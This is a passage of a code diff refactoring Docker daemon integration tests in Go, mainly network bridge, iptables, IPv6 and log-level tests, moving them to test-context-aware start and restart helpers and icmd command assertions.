-		c.Fatalf("Could not run iptables -nvL: %s, %v", out, err)
-	}
-
-	if strings.Contains(out, ipTablesSearchString) {
-		c.Fatalf("iptables output should not have contained %q, but was %q", ipTablesSearchString, out)
-	}
+	verifyIPTablesDoesNotContains(c, ipTablesSearchString)
 }
 
 func (s *DockerDaemonSuite) TestDaemonIptablesCreate(c *check.C) {
-	if err := s.d.StartWithBusybox(); err != nil {
-		c.Fatalf("Could not start daemon with busybox: %v", err)
-	}
+	s.d.StartWithBusybox(c)
 
 	if out, err := s.d.Cmd("run", "-d", "--name", "top", "--restart=always", "-p", "80", "busybox:latest", "top"); err != nil {
 		c.Fatalf("Could not run top: %s, %v", out, err)
@@ -314,38 +315,36 @@ func (s *DockerDaemonSuite) TestDaemonIptablesCreate(c *check.C) {
 
 	// get output from iptables with container running
 	ipTablesSearchString := "tcp dpt:80"
-	ipTablesCmd := exec.Command("iptables", "-nvL")
-	out, _, err := runCommandWithOutput(ipTablesCmd)
-	if err != nil {
-		c.Fatalf("Could not run iptables -nvL: %s, %v", out, err)
-	}
-
-	if !strings.Contains(out, ipTablesSearchString) {
-		c.Fatalf("iptables output should have contained %q, but was %q", ipTablesSearchString, out)
-	}
+	verifyIPTablesContains(c, ipTablesSearchString)
 
-	if err := s.d.Restart(); err != nil {
-		c.Fatalf("Could not restart daemon: %v", err)
-	}
+	s.d.Restart(c)
 
 	// make sure the container is not running
 	runningOut, err := s.d.Cmd("inspect", "--format={{.State.Running}}", "top")
 	if err != nil {
-		c.Fatalf("Could not inspect on container: %s, %v", out, err)
+		c.Fatalf("Could not inspect on container: %s, %v", runningOut, err)
 	}
 	if strings.TrimSpace(runningOut) != "true" {
 		c.Fatalf("Container should have been restarted after daemon restart. Status running should have been true but was: %q", strings.TrimSpace(runningOut))
 	}
 
 	// get output from iptables after restart
-	ipTablesCmd = exec.Command("iptables", "-nvL")
-	out, _, err = runCommandWithOutput(ipTablesCmd)
-	if err != nil {
-		c.Fatalf("Could not run iptables -nvL: %s, %v", out, err)
+	verifyIPTablesContains(c, ipTablesSearchString)
+}
+
+func verifyIPTablesContains(c *check.C, ipTablesSearchString string) {
+	result := icmd.RunCommand("iptables", "-nvL")
+	result.Assert(c, icmd.Success)
+	if !strings.Contains(result.Combined(), ipTablesSearchString) {
+		c.Fatalf("iptables output should have contained %q, but was %q", ipTablesSearchString, result.Combined())
 	}
+}
 
-	if !strings.Contains(out, ipTablesSearchString) {
-		c.Fatalf("iptables output after restart should have contained %q, but was %q", ipTablesSearchString, out)
+func verifyIPTablesDoesNotContains(c *check.C, ipTablesSearchString string) {
+	result := icmd.RunCommand("iptables", "-nvL")
+	result.Assert(c, icmd.Success)
+	if strings.Contains(result.Combined(), ipTablesSearchString) {
+		c.Fatalf("iptables output should not have contained %q, but was %q", ipTablesSearchString, result.Combined())
 	}
 }
 
@@ -357,9 +356,7 @@ func (s *DockerDaemonSuite) TestDaemonIPv6Enabled(c *check.C) {
 	setupV6(c)
 	defer teardownV6(c)
 
-	if err := s.d.StartWithBusybox("--ipv6"); err != nil {
-		c.Fatal(err)
-	}
+	s.d.StartWithBusybox(c, "--ipv6")
 
 	iface, err := net.InterfaceByName("docker0")
 	if err != nil {
@@ -417,11 +414,11 @@ func (s *DockerDaemonSuite) TestDaemonIPv6Enabled(c *check.C) {
 func (s *DockerDaemonSuite) TestDaemonIPv6FixedCIDR(c *check.C) {
 	// IPv6 setup is messing with local bridge address.
 	testRequires(c, SameHostDaemon)
-	setupV6(c)
-	defer teardownV6(c)
+	// Delete the docker0 bridge if its left around from previous daemon. It has to be recreated with
+	// ipv6 enabled
+	deleteInterface(c, "docker0")
 
-	err := s.d.StartWithBusybox("--ipv6", "--fixed-cidr-v6=2001:db8:2::/64", "--default-gateway-v6=2001:db8:2::100")
-	c.Assert(err, checker.IsNil, check.Commentf("Could not start daemon with busybox: %v", err))
+	s.d.StartWithBusybox(c, "--ipv6", "--fixed-cidr-v6=2001:db8:2::/64", "--default-gateway-v6=2001:db8:2::100")
 
 	out, err := s.d.Cmd("run", "-itd", "--name=ipv6test", "busybox:latest")
 	c.Assert(err, checker.IsNil, check.Commentf("Could not run container: %s, %v", out, err))
@@ -445,11 +442,11 @@ func (s *DockerDaemonSuite) TestDaemonIPv6FixedCIDR(c *check.C) {
 func (s *DockerDaemonSuite) TestDaemonIPv6FixedCIDRAndMac(c *check.C) {
 	// IPv6 setup is messing with local bridge address.
 	testRequires(c, SameHostDaemon)
-	setupV6(c)
-	defer teardownV6(c)
+	// Delete the docker0 bridge if its left around from previous daemon. It has to be recreated with
+	// ipv6 enabled
+	deleteInterface(c, "docker0")
 
-	err := s.d.StartWithBusybox("--ipv6", "--fixed-cidr-v6=2001:db8:1::/64")
-	c.Assert(err, checker.IsNil)
+	s.d.StartWithBusybox(c, "--ipv6", "--fixed-cidr-v6=2001:db8:1::/64")
 
 	out, err := s.d.Cmd("run", "-itd", "--name=ipv6test", "--mac-address", "AA:BB:CC:DD:EE:FF", "busybox")
 	c.Assert(err, checker.IsNil)
@@ -459,15 +456,29 @@ func (s *DockerDaemonSuite) TestDaemonIPv6FixedCIDRAndMac(c *check.C) {
 	c.Assert(strings.Trim(out, " \r\n'"), checker.Equals, "2001:db8:1::aabb:ccdd:eeff")
 }
 
+// TestDaemonIPv6HostMode checks that when the running a container with
+// network=host the host ipv6 addresses are not removed
+func (s *DockerDaemonSuite) TestDaemonIPv6HostMode(c *check.C) {
+	testRequires(c, SameHostDaemon)
+	deleteInterface(c, "docker0")
+
+	s.d.StartWithBusybox(c, "--ipv6", "--fixed-cidr-v6=2001:db8:2::/64")
+	out, err := s.d.Cmd("run", "-itd", "--name=hostcnt", "--network=host", "busybox:latest")
+	c.Assert(err, checker.IsNil, check.Commentf("Could not run container: %s, %v", out, err))
+
+	out, err = s.d.Cmd("exec", "hostcnt", "ip", "-6", "addr", "show", "docker0")
+	c.Assert(err, checker.IsNil)
+	c.Assert(strings.Trim(out, " \r\n'"), checker.Contains, "2001:db8:2::1")
+}
+
 func (s *DockerDaemonSuite) TestDaemonLogLevelWrong(c *check.C) {
-	c.Assert(s.d.Start("--log-level=bogus"), check.NotNil, check.Commentf("Daemon shouldn't start with wrong log level"))
+	c.Assert(s.d.StartWithError("--log-level=bogus"), check.NotNil, check.Commentf("Daemon shouldn't start with wrong log level"))
 }
 
 func (s *DockerDaemonSuite) TestDaemonLogLevelDebug(c *check.C) {
-	if err := s.d.Start("--log-level=debug"); err != nil {
-		c.Fatal(err)
-	}
-	content, _ := ioutil.ReadFile(s.d.logFile.Name())
+	s.d.Start(c, "--log-level=debug")
+	content, err := s.d.ReadLogFile()
+	c.Assert(err, checker.IsNil)
 	if !strings.Contains(string(content), `level=debug`) {
 		c.Fatalf(`Missing level="debug" in log file:\n%s`, string(content))
 	}
@@ -475,40 +486,36 @@ func (s *DockerDaemonSuite) TestDaemonLogLevelDebug(c *check.C) {
 
 func (s *DockerDaemonSuite) TestDaemonLogLevelFatal(c *check.C) {
 	// we creating new daemons to create new logFile
-	if err := s.d.Start("--log-level=fatal"); err != nil {
-		c.Fatal(err)
-	}
-	content, _ := ioutil.ReadFile(s.d.logFile.Name())
+	s.d.Start(c, "--log-level=fatal")
+	content, err := s.d.ReadLogFile()
+	c.Assert(err, checker.IsNil)
 	if strings.Contains(string(content), `level=debug`) {
 		c.Fatalf(`Should not have level="debug" in log file:\n%s`, string(content))
 	}
 }
 
 func (s *DockerDaemonSuite) TestDaemonFlagD(c *check.C) {
-	if err := s.d.Start("-D"); err != nil {
-		c.Fatal(err)
-	}
-	content, _ := ioutil.ReadFile(s.d.logFile.Name())
+	s.d.Start(c, "-D")
+	content, err := s.d.ReadLogFile()
+	c.Assert(err, checker.IsNil)
 	if !strings.Contains(string(content), `level=debug`) {
 		c.Fatalf(`Should have level="debug" in log file using -D:\n%s`, string(content))
 	}
 }
 
 func (s *DockerDaemonSuite) TestDaemonFlagDebug(c *check.C) {
-	if err := s.d.Start("--debug"); err != nil {
-		c.Fatal(err)
-	}
-	content, _ := ioutil.ReadFile(s.d.logFile.Name())
+	s.d.Start(c, "--debug")
+	content, err := s.d.ReadLogFile()
+	c.Assert(err, checker.IsNil)
 	if !strings.Contains(string(content), `level=debug`) {
 		c.Fatalf(`Should have level="debug" in log file using --debug:\n%s`, string(content))
 	}
 }
 
 func (s *DockerDaemonSuite) TestDaemonFlagDebugLogLevelFatal(c *check.C) {
-	if err := s.d.Start("--debug", "--log-level=fatal"); err != nil {
-		c.Fatal(err)
-	}
-	content, _ := ioutil.ReadFile(s.d.logFile.Name())
+	s.d.Start(c, "--debug", "--log-level=fatal")
+	content, err := s.d.ReadLogFile()
+	c.Assert(err, checker.IsNil)
 	if !strings.Contains(string(content), `level=debug`) {
 		c.Fatalf(`Should have level="debug" in log file when using both --debug and --log-level=fatal:\n%s`, string(content))
 	}
@@ -526,9 +533,7 @@ func (s *DockerDaemonSuite) TestDaemonAllocatesListeningPort(c *check.C) {
 		cmdArgs = append(cmdArgs, "--host", fmt.Sprintf("tcp://%s:%s", hostDirective[0], hostDirective[2]))
 	}
 
-	if err := s.d.StartWithBusybox(cmdArgs...); err != nil {
-		c.Fatalf("Could not start daemon with busybox: %v", err)
-	}
+	s.d.StartWithBusybox(c, cmdArgs...)
 
 	for _, hostDirective := range listeningPorts {
 		output, err := s.d.Cmd("run", "-p", fmt.Sprintf("%s:%s:80", hostDirective[1], hostDirective[2]), "busybox", "true")
@@ -543,10 +548,8 @@ func (s *DockerDaemonSuite) TestDaemonAllocatesListeningPort(c *check.C) {
 func (s *DockerDaemonSuite) TestDaemonKeyGeneration(c *check.C) {
 	// TODO: skip or update for Windows daemon
 	os.Remove("/etc/docker/key.json")
-	if err := s.d.Start(); err != nil {
-		c.Fatalf("Could not start daemon: %v", err)
-	}
-	s.d.Stop()
+	s.d.Start(c)
+	s.d.Stop(c)
 
 	k, err := libtrust.LoadKeyFile("/etc/docker/key.json")
 	if err != nil {
@@ -559,49 +562,18 @@ func (s *DockerDaemonSuite) TestDaemonKeyGeneration(c *check.C) {
 	}
 }
 
-func (s *DockerDaemonSuite) TestDaemonKeyMigration(c *check.C) {
-	// TODO: skip or update for Windows daemon
-	os.Remove("/etc/docker/key.json")
-	k1, err := libtrust.GenerateECP256PrivateKey()
-	if err != nil {
-		c.Fatalf("Error generating private key: %s", err)
-	}
-	if err := os.MkdirAll(filepath.Join(os.Getenv("HOME"), ".docker"), 0755); err != nil {
-		c.Fatalf("Error creating .docker directory: %s", err)
-	}
-	if err := libtrust.SaveKey(filepath.Join(os.Getenv("HOME"), ".docker", "key.json"), k1); err != nil {
-		c.Fatalf("Error saving private key: %s", err)
-	}
-
-	if err := s.d.Start(); err != nil {
-		c.Fatalf("Could not start daemon: %v", err)
-	}
-	s.d.Stop()
-
-	k2, err := libtrust.LoadKeyFile("/etc/docker/key.json")
-	if err != nil {
-		c.Fatalf("Error opening key file")
-	}
-	if k1.KeyID() != k2.KeyID() {
-		c.Fatalf("Key not migrated")
-	}
-}
-
 // GH#11320 - verify that the daemon exits on failure properly
 // Note that this explicitly tests the conflict of {-b,--bridge} and {--bip} options as the means
 // to get a daemon init failure; no other tests for -b/--bip conflict are therefore required
 func (s *DockerDaemonSuite) TestDaemonExitOnFailure(c *check.C) {
 	//attempt to start daemon with incorrect flags (we know -b and --bip conflict)
-	if err := s.d.Start("--bridge", "nosuchbridge", "--bip", "1.1.1.1"); err != nil {
+	if err := s.d.StartWithError("--bridge", "nosuchbridge", "--bip", "1.1.1.1"); err != nil {
 		//verify we got the right error
 		if !strings.Contains(err.Error(), "Daemon exited") {
 			c.Fatalf("Expected daemon not to start, got %v", err)
 		}
 		// look in the log and make sure we got the message that daemon is shutting down
-		runCmd := exec.Command("grep", "Error starting daemon", s.d.LogFileName())
-		if out, _, err := runCommandWithOutput(runCmd); err != nil {
-			c.Fatalf("Expected 'Error starting daemon' message; but doesn't exist in log: %q, err: %v", out, err)
-		}
+		icmd.RunCommand("grep", "Error starting daemon", s.d.LogFileName()).Assert(c, icmd.Success)
 	} else {
 		//if we didn't get an error and the daemon is running, this is a failure
 		c.Fatal("Conflicting options should cause the daemon to error out with a failure")
@@ -610,34 +582,28 @@ func (s *DockerDaemonSuite) TestDaemonExitOnFailure(c *check.C) {
 
 func (s *DockerDaemonSuite) TestDaemonBridgeExternal(c *check.C) {
 	d := s.d
-	err := d.Start("--bridge", "nosuchbridge")
+	err := d.StartWithError("--bridge", "nosuchbridge")
 	c.Assert(err, check.NotNil, check.Commentf("--bridge option with an invalid bridge should cause the daemon to fail"))
-	defer d.Restart()
+	defer d.Restart(c)
 
 	bridgeName := "external-bridge"
 	bridgeIP := "192.169.1.1/24"
 	_, bridgeIPNet, _ := net.ParseCIDR(bridgeIP)
 
-	out, err := createInterface(c, "bridge", bridgeName, bridgeIP)
-	c.Assert(err, check.IsNil, check.Commentf(out))
+	createInterface(c, "bridge", bridgeName, bridgeIP)
 	defer deleteInterface(c, bridgeName)
 
-	err = d.StartWithBusybox("--bridge", bridgeName)
-	c.Assert(err, check.IsNil)
+	d.StartWithBusybox(c, "--bridge", bridgeName)
 
 	ipTablesSearchString := bridgeIPNet.String()
-	ipTablesCmd := exec.Command("iptables", "-t", "nat", "-nvL")
-	out, _, err = runCommandWithOutput(ipTablesCmd)
-	c.Assert(err, check.IsNil)
-
-	c.Assert(strings.Contains(out, ipTablesSearchString), check.Equals, true,
-		check.Commentf("iptables output should have contained %q, but was %q",
-			ipTablesSearchString, out))
+	icmd.RunCommand("iptables", "-t", "nat", "-nvL").Assert(c, icmd.Expected{
+		Out: ipTablesSearchString,
+	})
 
 	_, err = d.Cmd("run", "-d", "--name", "ExtContainer", "busybox", "top")
 	c.Assert(err, check.IsNil)
 
-	containerIP := d.findContainerIP("ExtContainer")
+	containerIP := d.FindContainerIP(c, "ExtContainer")
 	ip := net.ParseIP(containerIP)
 	c.Assert(bridgeIPNet.Contains(ip), check.Equals, true,
 		check.Commentf("Container IP-Address must be in the same subnet range : %s",
@@ -647,46 +613,31 @@ func (s *DockerDaemonSuite) TestDaemonBridgeExternal(c *check.C) {
 func (s *DockerDaemonSuite) TestDaemonBridgeNone(c *check.C) {
 	// start with bridge none
 	d := s.d
-	err := d.StartWithBusybox("--bridge", "none")
-	c.Assert(err, check.IsNil)
-	defer d.Restart()
+	d.StartWithBusybox(c, "--bridge", "none")
+	defer d.Restart(c)
 
 	// verify docker0 iface is not there
-	out, _, err := runCommandWithOutput(exec.Command("ifconfig", "docker0"))
-	c.Assert(err, check.NotNil, check.Commentf("docker0 should not be present if daemon started with --bridge=none"))
-	c.Assert(strings.Contains(out, "Device not found"), check.Equals, true)
+	icmd.RunCommand("ifconfig", "docker0").Assert(c, icmd.Expected{
+		ExitCode: 1,
+		Error:    "exit status 1",
+		Err:      "Device not found",
+	})
 
 	// verify default "bridge" network is not there
-	out, err = d.Cmd("network", "inspect", "bridge")
+	out, err := d.Cmd("network", "inspect", "bridge")
 	c.Assert(err, check.NotNil, check.Commentf("\"bridge\" network should not be present if daemon started with --bridge=none"))
 	c.Assert(strings.Contains(out, "No such network"), check.Equals, true)
 }
 
-func createInterface(c *check.C, ifType string, ifName string, ipNet string) (string, error) {
-	args := []string{"link", "add", "name", ifName, "type", ifType}
-	ipLinkCmd := exec.Command("ip", args...)
-	out, _, err := runCommandWithOutput(ipLinkCmd)
-	if err != nil {
-		return out, err
-	}
-
-	ifCfgCmd := exec.Command("ifconfig", ifName, ipNet, "up")
-	out, _, err = runCommandWithOutput(ifCfgCmd)
-	return out, err
+func createInterface(c *check.C, ifType string, ifName string, ipNet string) {
+	icmd.RunCommand("ip", "link", "add", "name", ifName, "type", ifType).Assert(c, icmd.Success)
+	icmd.RunCommand("ifconfig", ifName, ipNet, "up").Assert(c, icmd.Success)
 }
 
 func deleteInterface(c *check.C, ifName string) {
-	ifCmd := exec.Command("ip", "link", "delete", ifName)
-	out, _, err := runCommandWithOutput(ifCmd)
-	c.Assert(err, check.IsNil, check.Commentf(out))
-
-	flushCmd := exec.Command("iptables", "-t", "nat", "--flush")
-	out, _, err = runCommandWithOutput(flushCmd)
-	c.Assert(err, check.IsNil, check.Commentf(out))
-
-	flushCmd = exec.Command("iptables", "--flush")
-	out, _, err = runCommandWithOutput(flushCmd)
-	c.Assert(err, check.IsNil, check.Commentf(out))
+	icmd.RunCommand("ip", "link", "delete", ifName).Assert(c, icmd.Success)
+	icmd.RunCommand("iptables", "-t", "nat", "--flush").Assert(c, icmd.Success)
+	icmd.RunCommand("iptables", "--flush").Assert(c, icmd.Success)
 }
 
 func (s *DockerDaemonSuite) TestDaemonBridgeIP(c *check.C) {
@@ -707,32 +658,23 @@ func (s *DockerDaemonSuite) TestDaemonBridgeIP(c *check.C) {
 	bridgeIP := "192.169.1.1/24"
 	ip, bridgeIPNet, _ := net.ParseCIDR(bridgeIP)
 
-	err := d.StartWithBusybox("--bip", bridgeIP)
-	c.Assert(err, check.IsNil)
-	defer d.Restart()
+	d.StartWithBusybox(c, "--bip", bridgeIP)
+	defer d.Restart(c)
 
 	ifconfigSearchString := ip.String()
-	ifconfigCmd := exec.Command("ifconfig", defaultNetworkBridge)
-	out, _, _, err := runCommandWithStdoutStderr(ifconfigCmd)
-	c.Assert(err, check.IsNil)
-
-	c.Assert(strings.Contains(out, ifconfigSearchString), check.Equals, true,
-		check.Commentf("ifconfig output should have contained %q, but was %q",
-			ifconfigSearchString, out))
+	icmd.RunCommand("ifconfig", defaultNetworkBridge).Assert(c, icmd.Expected{
+		Out: ifconfigSearchString,
+	})
 
 	ipTablesSearchString := bridgeIPNet.String()
-	ipTablesCmd := exec.Command("iptables", "-t", "nat", "-nvL")
-	out, _, err = runCommandWithOutput(ipTablesCmd)
-	c.Assert(err, check.IsNil)
+	icmd.RunCommand("iptables", "-t", "nat", "-nvL").Assert(c, icmd.Expected{
+		Out: ipTablesSearchString,
+	})
 
-	c.Assert(strings.Contains(out, ipTablesSearchString), check.Equals, true,
-		check.Commentf("iptables output should have contained %q, but was %q",
-			ipTablesSearchString, out))
-
-	out, err = d.Cmd("run", "-d", "--name", "test", "busybox", "top")
+	_, err := d.Cmd("run", "-d", "--name", "test", "busybox", "top")
 	c.Assert(err, check.IsNil)
 
-	containerIP := d.findContainerIP("test")
+	containerIP := d.FindContainerIP(c, "test")
 	ip = net.ParseIP(containerIP)
 	c.Assert(bridgeIPNet.Contains(ip), check.Equals, true,
 		check.Commentf("Container IP-Address must be in the same subnet range : %s",
@@ -741,38 +683,23 @@ func (s *DockerDaemonSuite) TestDaemonBridgeIP(c *check.C) {
 }
 
 func (s *DockerDaemonSuite) TestDaemonRestartWithBridgeIPChange(c *check.C) {
-	if err := s.d.Start(); err != nil {
-		c.Fatalf("Could not start daemon: %v", err)
-	}
-	defer s.d.Restart()
-	if err := s.d.Stop(); err != nil {
-		c.Fatalf("Could not stop daemon: %v", err)
-	}
+	s.d.Start(c)
+	defer s.d.Restart(c)
+	s.d.Stop(c)
 
 	// now we will change the docker0's IP and then try starting the daemon
 	bridgeIP := "192.169.100.1/24"
 	_, bridgeIPNet, _ := net.ParseCIDR(bridgeIP)
 
-	ipCmd := exec.Command("ifconfig", "docker0", bridgeIP)
-	stdout, stderr, _, err := runCommandWithStdoutStderr(ipCmd)
-	if err != nil {
-		c.Fatalf("failed to change docker0's IP association: %v, stdout: %q, stderr: %q", err, stdout, stderr)
-	}
+	icmd.RunCommand("ifconfig", "docker0", bridgeIP).Assert(c, icmd.Success)
 
-	if err := s.d.Start("--bip", bridgeIP); err != nil {
-		c.Fatalf("Could not start daemon: %v", err)
-	}
+	s.d.Start(c, "--bip", bridgeIP)
 
 	//check if the iptables contains new bridgeIP MASQUERADE rule
 	ipTablesSearchString := bridgeIPNet.String()
-	ipTablesCmd := exec.Command("iptables", "-t", "nat", "-nvL")
-	out, _, err := runCommandWithOutput(ipTablesCmd)
-	if err != nil {
-		c.Fatalf("Could not run iptables -nvL: %s, %v", out, err)
-	}
-	if !strings.Contains(out, ipTablesSearchString) {
-		c.Fatalf("iptables output should have contained new MASQUERADE rule with IP %q, but was %q", ipTablesSearchString, out)
-	}
+	icmd.RunCommand("iptables", "-t", "nat", "-nvL").Assert(c, icmd.Expected{
+		Out: ipTablesSearchString,
+	})
 }
 
 func (s *DockerDaemonSuite) TestDaemonBridgeFixedCidr(c *check.C) {
@@ -781,14 +708,12 @@ func (s *DockerDaemonSuite) TestDaemonBridgeFixedCidr(c *check.C) {
 	bridgeName := "external-bridge"
 	bridgeIP := "192.169.1.1/24"
 
-	out, err := createInterface(c, "bridge", bridgeName, bridgeIP)
-	c.Assert(err, check.IsNil, check.Commentf(out))
+	createInterface(c, "bridge", bridgeName, bridgeIP)
 	defer deleteInterface(c, bridgeName)
 
 	args := []string{"--bridge", bridgeName, "--fixed-cidr", "192.169.1.0/30"}
-	err = d.StartWithBusybox(args...)
-	c.Assert(err, check.IsNil)
-	defer d.Restart()
+	d.StartWithBusybox(c, args...)
+	defer d.Restart(c)
 
 	for i := 0; i < 4; i++ {
 		cName := "Container" + strconv.Itoa(i)
@@ -806,15 +731,13 @@ func (s *DockerDaemonSuite) TestDaemonBridgeFixedCidr2(c *check.C) {
 	bridgeName := "external-bridge"
 	bridgeIP := "10.2.2.1/16"
 
-	out, err := createInterface(c, "bridge", bridgeName, bridgeIP)
-	c.Assert(err, check.IsNil, check.Commentf(out))
+	createInterface(c, "bridge", bridgeName, bridgeIP)
 	defer deleteInterface(c, bridgeName)
 
-	err = d.StartWithBusybox("--bip", bridgeIP, "--fixed-cidr", "10.2.2.0/24")
-	c.Assert(err, check.IsNil)
-	defer s.d.Restart()
+	d.StartWithBusybox(c, "--bip", bridgeIP, "--fixed-cidr", "10.2.2.0/24")
+	defer s.d.Restart(c)
 
-	out, err = d.Cmd("run", "-d", "--name", "bb", "busybox", "top")
+	out, err := d.Cmd("run", "-d", "--name", "bb", "busybox", "top")
 	c.Assert(err, checker.IsNil, check.Commentf(out))
 	defer d.Cmd("stop", "bb")
 
@@ -832,15 +755,13 @@ func (s *DockerDaemonSuite) TestDaemonBridgeFixedCIDREqualBridgeNetwork(c *check
 	bridgeName := "external-bridge"
 	bridgeIP := "172.27.42.1/16"
 
-	out, err := createInterface(c, "bridge", bridgeName, bridgeIP)
-	c.Assert(err, check.IsNil, check.Commentf(out))
+	createInterface(c, "bridge", bridgeName, bridgeIP)
 	defer deleteInterface(c, bridgeName)
 
-	err = d.StartWithBusybox("--bridge", bridgeName, "--fixed-cidr", bridgeIP)
-	c.Assert(err, check.IsNil)
-	defer s.d.Restart()
+	d.StartWithBusybox(c, "--bridge", bridgeName, "--fixed-cidr", bridgeIP)
+	defer s.d.Restart(c)
 
-	out, err = d.Cmd("run", "-d", "busybox", "top")
+	out, err := d.Cmd("run", "-d", "busybox", "top")
 	c.Assert(err, check.IsNil, check.Commentf(out))
 	cid1 := strings.TrimSpace(out)
 	defer d.Cmd("stop", cid1)
@@ -855,12 +776,12 @@ func (s *DockerDaemonSuite) TestDaemonDefaultGatewayIPv4Implicit(c *check.C) {
 	bridgeIP := "192.169.1.1"
 	bridgeIPNet := fmt.Sprintf("%s/24", bridgeIP)
 
-	err := d.StartWithBusybox("--bip", bridgeIPNet)
-	c.Assert(err, check.IsNil)
-	defer d.Restart()
+	d.StartWithBusybox(c, "--bip", bridgeIPNet)
+	defer d.Restart(c)
 
 	expectedMessage := fmt.Sprintf("default via %s dev", bridgeIP)
 	out, err := d.Cmd("run", "busybox", "ip", "-4", "route", "list", "0/0")
+	c.Assert(err, checker.IsNil)
 	c.Assert(strings.Contains(out, expectedMessage), check.Equals, true,
 		check.Commentf("Implicit default gateway should be bridge IP %s, but default route was '%s'",
 			bridgeIP, strings.TrimSpace(out)))
@@ -877,12 +798,12 @@ func (s *DockerDaemonSuite) TestDaemonDefaultGatewayIPv4Explicit(c *check.C) {
 	bridgeIPNet := fmt.Sprintf("%s/24", bridgeIP)
 	gatewayIP := "192.169.1.254"
 
-	err := d.StartWithBusybox("--bip", bridgeIPNet, "--default-gateway", gatewayIP)
-	c.Assert(err, check.IsNil)
-	defer d.Restart()
+	d.StartWithBusybox(c, "--bip", bridgeIPNet, "--default-gateway", gatewayIP)
+	defer d.Restart(c)
 
 	expectedMessage := fmt.Sprintf("default via %s dev", gatewayIP)
 	out, err := d.Cmd("run", "busybox", "ip", "-4", "route", "list", "0/0")
+	c.Assert(err, checker.IsNil)
 	c.Assert(strings.Contains(out, expectedMessage), check.Equals, true,
 		check.Commentf("Explicit default gateway should be %s, but default route was '%s'",
 			gatewayIP, strings.TrimSpace(out)))
@@ -894,11 +815,10 @@ func (s *DockerDaemonSuite) TestDaemonDefaultGatewayIPv4ExplicitOutsideContainer
 	deleteInterface(c, defaultNetworkBridge)
 
 	// Program a custom default gateway outside of the container subnet, daemon should accept it and start
-	err := s.d.StartWithBusybox("--bip", "172.16.0.10/16", "--fixed-cidr", "172.16.1.0/24", "--default-gateway", "172.16.0.254")
-	c.Assert(err, check.IsNil)
+	s.d.StartWithBusybox(c, "--bip", "172.16.0.10/16", "--fixed-cidr", "172.16.1.0/24", "--default-gateway", "172.16.0.254")
 
 	deleteInterface(c, defaultNetworkBridge)
-	s.d.Restart()
+	s.d.Restart(c)
 }
 
 func (s *DockerDaemonSuite) TestDaemonDefaultNetworkInvalidClusterConfig(c *check.C) {
@@ -909,15 +829,13 @@ func (s *DockerDaemonSuite) TestDaemonDefaultNetworkInvalidClusterConfig(c *chec
 	deleteInterface(c, defaultNetworkBridge)
 
 	discoveryBackend := "consul://consuladdr:consulport/some/path"
-	err := s.d.Start(fmt.Sprintf("--cluster-store=%s", discoveryBackend))
-	c.Assert(err, checker.IsNil)
+	s.d.Start(c, fmt.Sprintf("--cluster-store=%s", discoveryBackend))
 
 	// Start daemon with docker0 bridge
 	result := icmd.RunCommand("ifconfig", defaultNetworkBridge)
-	c.Assert(result, icmd.Matches, icmd.Success)
+	result.Assert(c, icmd.Success)
 
-	err = s.d.Restart(fmt.Sprintf("--cluster-store=%s", discoveryBackend))
-	c.Assert(err, checker.IsNil)
+	s.d.Restart(c, fmt.Sprintf("--cluster-store=%s", discoveryBackend))
 }
 
 func (s *DockerDaemonSuite) TestDaemonIP(c *check.C) {
@@ -926,9 +844,8 @@ func (s *DockerDaemonSuite) TestDaemonIP(c *check.C) {
 	ipStr := "192.170.1.1/24"
 	ip, _, _ := net.ParseCIDR(ipStr)
 	args := []string{"--ip", ip.String()}
-	err := d.StartWithBusybox(args...)
-	c.Assert(err, check.IsNil)
-	defer d.Restart()
+	d.StartWithBusybox(c, args...)
+	defer d.Restart(c)
 
 	out, err := d.Cmd("run", "-d", "-p", "8000:8000", "busybox", "top")
 	c.Assert(err, check.NotNil,
@@ -936,21 +853,18 @@ func (s *DockerDaemonSuite) TestDaemonIP(c *check.C) {
 	c.Assert(strings.Contains(out, "Error starting userland proxy"), check.Equals, true)
 
 	ifName := "dummy"
-	out, err = createInterface(c, "dummy", ifName, ipStr)
-	c.Assert(err, check.IsNil, check.Commentf(out))
+	createInterface(c, "dummy", ifName, ipStr)
 	defer deleteInterface(c, ifName)
 
 	_, err = d.Cmd("run", "-d", "-p", "8000:8000", "busybox", "top")
 	c.Assert(err, check.IsNil)
 
-	ipTablesCmd := exec.Command("iptables", "-t", "nat", "-nvL")
-	out, _, err = runCommandWithOutput(ipTablesCmd)
-	c.Assert(err, check.IsNil)
-
+	result := icmd.RunCommand("iptables", "-t", "nat", "-nvL")
+	result.Assert(c, icmd.Success)
 	regex := fmt.Sprintf("DNAT.*%s.*dpt:8000", ip.String())
-	matched, _ := regexp.MatchString(regex, out)
+	matched, _ := regexp.MatchString(regex, result.Combined())
 	c.Assert(matched, check.Equals, true,
-		check.Commentf("iptables output should have contained %q, but was %q", regex, out))
+		check.Commentf("iptables output should have contained %q, but was %q", regex, result.Combined()))
 }
 
 func (s *DockerDaemonSuite) TestDaemonICCPing(c *check.C) {
@@ -960,23 +874,18 @@ func (s *DockerDaemonSuite) TestDaemonICCPing(c *check.C) {
 	bridgeName := "external-bridge"
 	bridgeIP := "192.169.1.1/24"
 
-	out, err := createInterface(c, "bridge", bridgeName, bridgeIP)
-	c.Assert(err, check.IsNil, check.Commentf(out))
+	createInterface(c, "bridge", bridgeName, bridgeIP)
 	defer deleteInterface(c, bridgeName)
 
-	args := []string{"--bridge", bridgeName, "--icc=false"}
-	err = d.StartWithBusybox(args...)
-	c.Assert(err, check.IsNil)
-	defer d.Restart()
-
-	ipTablesCmd := exec.Command("iptables", "-nvL", "FORWARD")
-	out, _, err = runCommandWithOutput(ipTablesCmd)
-	c.Assert(err, check.IsNil)
+	d.StartWithBusybox(c, "--bridge", bridgeName, "--icc=false")
+	defer d.Restart(c)
 
+	result := icmd.RunCommand("iptables", "-nvL", "FORWARD")
+	result.Assert(c, icmd.Success)
 	regex := fmt.Sprintf("DROP.*all.*%s.*%s", bridgeName, bridgeName)
-	matched, _ := regexp.MatchString(regex, out)
+	matched, _ := regexp.MatchString(regex, result.Combined())
 	c.Assert(matched, check.Equals, true,
-		check.Commentf("iptables output should have contained %q, but was %q", regex, out))
+		check.Commentf("iptables output should have contained %q, but was %q", regex, result.Combined()))
 
 	// Pinging another container must fail with --icc=false
 	pingContainers(c, d, true)
@@ -990,7 +899,7 @@ func (s *DockerDaemonSuite) TestDaemonICCPing(c *check.C) {
 	// But, Pinging external or a Host interface must succeed
 	pingCmd := fmt.Sprintf("ping -c 1 %s -W 1", ip.String())
 	runArgs := []string{"run", "--rm", "busybox", "sh", "-c", pingCmd}
-	_, err = d.Cmd(runArgs...)
+	_, err := d.Cmd(runArgs...)
